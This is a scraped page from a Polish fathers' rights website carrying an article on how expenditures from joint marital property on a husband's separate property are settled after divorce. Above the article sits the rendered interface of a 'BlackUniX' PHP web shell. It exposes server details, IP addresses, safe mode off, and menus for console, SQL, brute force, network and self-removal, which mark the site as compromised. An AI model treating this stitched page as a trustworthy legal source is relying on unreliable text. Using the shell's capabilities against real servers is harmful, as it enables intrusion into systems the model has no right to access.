W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-21 19:45:02
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.166.141.12
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Prawa do nieruchomości po rozwodzie
19.05.2008.
Zgodnie z ogólną reguła prawa rodzinnego, każdy z małżonków powinien zwrócić wydatki i nakłady poczynione z majątku wspólnego na jego majątek osobisty, z wyjątkiem wydatków i nakładów koniecznych (art. 45 § 1 zd. 1 kodeksu rodzinnego i opiekuńczego).
Nie można jednak żądać zwrotu wydatków i nakładów zużytych w celu zaspokojenia potrzeb rodziny, chyba że zwiększyły wartość majątku w chwili ustania wspólności.

Nie ma definicji „nakładów i wydatków” w rozumieniu art. 45 k.r.o. Przyjmuje się, że obejmują one wszystkie przysporzenia na rzecz jednej masy majątkowej, których dokonano z uszczerbkiem dla drugiej. Innymi słowy, majątek osobisty męża rośnie kosztem spadku wartości (lub niewzrastania) majątku wspólnego. Źródłem takiego transferu może być zarówno czynność prawna, jak i faktyczna, np. zamontowanie okien w budynku.

Zasadniczo zwrotu dokonuje się w razie rozwodu (formalnej separacji), ale można też wówczas, gdy przemawia za tym dobro rodziny mimo trwania małżeństwa (np. długotrwała separacja faktyczna spowodowana zagranicznym wyjazdem jednego z małżonków).

W rozliczeniach powinno się też uwzględnić „dług jednego z małżonków (...) zaspokojony z majątku wspólnego”. W naszym wypadku nie mamy jednak do czynienia z długiem jednego małżonka, lecz długiem małżonków (pożyczka), który był źródłem środków zwiększających wartość majątku osobistego męża (sfinansowania budowy domu na jego działce). Tu także należy zastosować art. 45 k.r.o., pamiętając o kilku potencjalnych rafach.

Jeśli rodzina mieszkała w wybudowanym z pożyczki domu, to „nakład” przyczynił się do „zaspokojenia potrzeb rodziny”. Zatem rozliczenie jest niedopuszczalne. Wyjątkiem od wyjątku jest „zwiększenie się wartości majątku osobistego” (nieruchomość stała się cenniejsza dzięki zabudowaniu), mimo iż w budynku tym mieszkała rodzina, „zaspokajając swoje potrzeby”. Sprawę dalej można gmatwać, gdy przyjmiemy, że oprócz nakładów z majątku wspólnego także nakłady z majątku osobistego żony zostały wykorzystane na sfinansowanie budowy domu na działce męża.

Art. 45 k.r.o. dotyczy zwrotu nakładów z majątku wspólnego na majątek osobisty jednego z małżonków oraz z majątku osobistego na majątek wspólny. Przepis ten nie rozstrzyga natomiast sposobu rozliczenia nakładów z majątku osobistego jednego z małżonków na majątek osobisty drugiego. Podstawę tych rozliczeń stanowią przepisy kodeksu cywilnego (wyrok Sądu Na podstawie : Rzeczpospolita (Jak rozliczyć się przy rozwodzie z praw do nieruchomości)
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


21.06.2018.